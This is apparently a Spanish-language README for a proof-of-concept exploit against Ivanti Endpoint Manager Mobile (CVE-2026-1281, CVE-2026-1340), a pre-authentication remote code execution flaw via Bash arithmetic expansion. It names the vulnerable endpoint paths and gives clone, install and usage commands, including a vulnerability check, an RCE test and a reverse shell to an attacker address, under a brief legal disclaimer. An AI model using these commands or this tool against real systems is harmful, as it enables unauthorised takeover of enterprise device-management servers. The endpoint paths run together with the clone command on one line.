
Prueba de concepto para CVE-2026-1281 y CVE-2026-1340 - RCE pre-autenticación en Ivanti EPMM mediante expansión aritmética de Bash
⚠️ AVISO LEGAL: Este PoC se proporciona únicamente con fines educativos y de investigación en seguridad. Su uso sin autorización explícita es ilegal.
Proof of Concept (PoC) completo para la explotación de las vulnerabilidades CVE-2026-1281 y CVE-2026-1340 que afectan a Ivanti Endpoint Manager Mobile (EPMM). Estas vulnerabilidades permiten la ejecución remota de código arbitrario (RCE) sin autenticación mediante un mecanismo de Bash Arithmetic Expansion.
/mifs/c/appstore/fob//mifs/c/aftstore/fob/git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
# Prueba de vulnerabilidad
python3 exploit.py -t https://target.com -c
# Validación RCE
python3 exploit.py -t https://target.com --test-rce
# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
Mehdi Le Deaut - Consultor de Ciberseguridad | Especialista en Red Team
Este proyecto está bajo licencia MIT - consulte el archivo LICENSE para más detalles.